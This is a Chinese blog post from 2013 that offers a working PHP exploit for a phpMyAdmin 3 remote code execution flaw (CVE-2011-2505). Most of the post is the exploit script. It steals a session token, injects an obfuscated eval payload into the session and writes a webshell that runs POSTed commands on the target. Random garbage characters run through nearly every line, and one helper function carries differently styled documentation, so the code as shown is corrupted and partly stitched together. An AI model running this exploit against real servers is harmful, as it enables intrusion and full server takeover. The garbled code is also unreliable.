
phpMyAdmin3 remote code execute php版本exploit

发表于 2013-2-21 09:13:03
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。

昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了番,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。

首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。

在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

于是写了这个php版本的exp,代码如下:

8 @8 L; r0 L, X- y) P+ h- w#!/usr/bin/php
+ J. k3 o# M* Q2 u) N3 y4 g' D<?php, ?/ A  L4 u( E- j# y
print_r('
+ A/ `3 F, }6 b% Y% @. q) Y* J! z+---------------------------------------------------------------------------+
; _: f7 J- G  O" k' ^pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
/ E1 R! S6 p% @  c0 nby oldjun(www.oldjun.com)
7 X* A5 h7 x# O' Swelcome to www.t00ls.net
2 M0 b! a- G( G9 A* n7 @( F$ Gmail: oldjun@gmail.com% _: U. S' q; X( f
Assigned CVE id: CVE-2011-2505: h" I# ~3 E! L3 \3 S. y
+---------------------------------------------------------------------------+, x6 e- ^+ Q$ U5 F
');
! c6 V9 k7 K7 s( O  N5 J8 @# e2 T6 a. C
/**
. r( U5 @, y, }) U1 h) l * working when the directory:"config" exists and is writeable.
' N  b0 _. {; E  O9 c**/
7 Y) s8 T# Q+ s' }2 `
9 G7 H- Q1 }( r% [1 w+ Hif ($argc < 3) {
' q- ^) t! n( t1 d+ _7 e    print_r('0 I4 m- y3 ~! d# W" p9 B% k+ H
+---------------------------------------------------------------------------+
1 M% {# {4 T- b! `Usage: php '.$argv[0].' host path4 m0 p$ L; `" ^
host:      target server (ip/hostname)7 O2 C% J/ d6 L  H
path:      path to pma3
/ }$ r: w0 b* P! m; }Example:8 l: w, {! g& C$ }# I7 G
php '.$argv[0].' localhost /pma/5 G, H7 ?' t! Y5 h* B! p
+---------------------------------------------------------------------------+
2 Z: P  H: S) b) j6 z( s');
4 U$ l9 g* B1 z' d+ B    exit;
, Q6 G; p% w: `/ t! g}
  N. u: {# r, p4 a4 Y* W  b
) y0 U& ^+ O5 E# x, j$host = $argv[1];
' G: O( }$ }9 m+ j& @; A$path = $argv[2];/ `8 K$ \. n! B- T( K  \* l% e

) R6 B6 g# y3 m' c" s$ \* H! F- I0 G/**2 v: C  v7 ]/ k' t% |" \
* Try to determine if the directory:"config" exists
% ?7 r) H; o! _! W**/
" r* N- j1 R, l- O. F/ W8 X4 Eecho "[+] Try to determine if the directory:config exists....\n";
. M" n3 |, ^& J$returnstr=php_request('config/');
0 B8 }9 n. _  w  d* a- aif(strpos($returnstr,'404')){
. y0 G  I- [% H/ T$ z0 Z    exit("[-] Exploit Failed! The directory:config do not exists!\n");& e4 S7 v; f% i% n0 C2 Q) T+ m- J" k
}1 s$ C# q1 m6 |/ p5 \; O

/ W6 |( j6 M" }! K6 e  A8 I1 k/**- v0 j) B; e( i1 U
* Try to get token and sessionid' \- c' N3 Z. D6 U
**/
5 S) e, W! {3 r) U, Zecho "[+] Try to get token and sessionid....\n";
4 w& D6 n( y+ v, q$result=php_request('index.php');! e) i2 j" Z& `  L% q" Q
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
* j- |9 ?) L7 U$token=$resp[3];+ p. Y" g- f- }* [3 p
$sessionid=$resp[1];2 O5 C; B$ `: i1 G: Z
if($token && $sessionid){
' B( u+ S* u( F( L( r    echo "[+] tokentoken\n";
# C- r+ N% |, |( S% U& _% A    echo "[+] Session IDsessionid\n";
! ~2 w6 ?9 R2 g0 y6 {' A# Y}else{4 J# \) |. t# Z: G: O$ e" n; C
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
" H$ a1 k) j$ o3 ^0 B4 m$ s}
& q1 e- h% A5 w
2 \. e+ B8 b) w; u' X% D/**% Z. A8 S/ j. _) _. ?" V! h1 d
* Try to insert shell into session+ K* B) r# ~% _! ?7 M
**/
3 b8 L% _+ Y& Recho "[+] Try to insert shell into session....\n";& T8 n- M' r& [7 h3 a+ S
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
/ P" w: q2 P9 F% d/ d
& Y# u2 ?  E# s  R9 |: v/**3 u/ d5 A; ~, T5 n
* Try to create webshell
9 y4 Y2 ^& r' u$ j' b**/8 b0 B6 i2 S3 ?
echo "[+] Try to create webshell....\n";1 p$ y$ }! T5 g3 x& E, c3 p
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
- E# ~  F) C0 F4 @1 C/**
" j! r& b) o3 v  d * Try to check if the webshell was created successfully
* V; ^0 G% m$ e**/
/ H7 T) P: Q, [$ Gecho "[+] Try to check if the webshell was created successfully....\n";
+ I- G8 I/ _% G* b$content=php_request('config/config.inc.php');
, O# Z# r! w* j, l# ^+ }if(strpos($content,'t00ls')){
4 U0 \  N. g& e$ O7 |    echo "[+] Congratulations! Expoilt successfully....\n";
7 [% k- q+ l, N    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";. {5 O! r8 J7 Z6 _
}else{
5 J* i0 N( v9 I    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");3 P; Z/ n* k7 b; o& o# M
}
/ a9 w3 ?0 ~7 C: |9 I9 O
/**
 * Send one raw HTTP/1.1 request over a plain TCP socket and return the
 * unparsed response (status line, headers and body as a single string).
 *
 * @param string $url    Path appended to the global $path prefix by plain
 *                       string concatenation (no URL joining or encoding).
 * @param string $data   Request body; when truthy the request is sent as a
 *                       form-encoded POST, otherwise as a GET with no body.
 * @param string $cookie Raw Cookie header value; the header is omitted when empty.
 * @return string        Everything read from the socket until the peer closes it.
 *                       If the connection cannot be opened the script prints a
 *                       message and dies instead of returning.
 *
 * Reads the globals $host and $path set by the top-level script. Always
 * connects to port 80 in clear text; no timeout argument is passed and the
 * response status is not inspected here -- callers grep the raw text.
 */
function php_request($url, $data = '', $cookie = '') {
    global $host, $path;

    $is_post = (bool) $data;   // PHP truthiness: '' and '0' both mean GET
    $lines   = array(
        ($is_post ? 'POST' : 'GET') . ' ' . $path . $url . ' HTTP/1.1',
        'Accept: */*',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
        'Host: ' . $host,
    );
    if ($is_post) {
        // Content-Length is the byte length of the body as given.
        $lines[] = 'Content-Type: application/x-www-form-urlencoded';
        $lines[] = 'Content-Length: ' . strlen($data);
    }
    if ($cookie) {
        $lines[] = 'Cookie: ' . $cookie;
    }
    $lines[] = 'Connection: Close';

    // The empty line ends the header block; the body follows only for POST.
    $packet = implode("\r\n", $lines) . "\r\n\r\n" . ($is_post ? $data : '');

    $sock = fsockopen(gethostbyname($host), 80);
    if (!$sock) {
        echo 'No response from ' . $host;
        die;
    }
    fputs($sock, $packet);

    // Drain the socket until EOF; Connection: Close makes the server hang up.
    $resp = '';
    while ($sock && !feof($sock)) {
        $resp .= fread($sock, 1024);
    }
    return $resp;
}
    # @" `% d! `: \/ ~) H
?>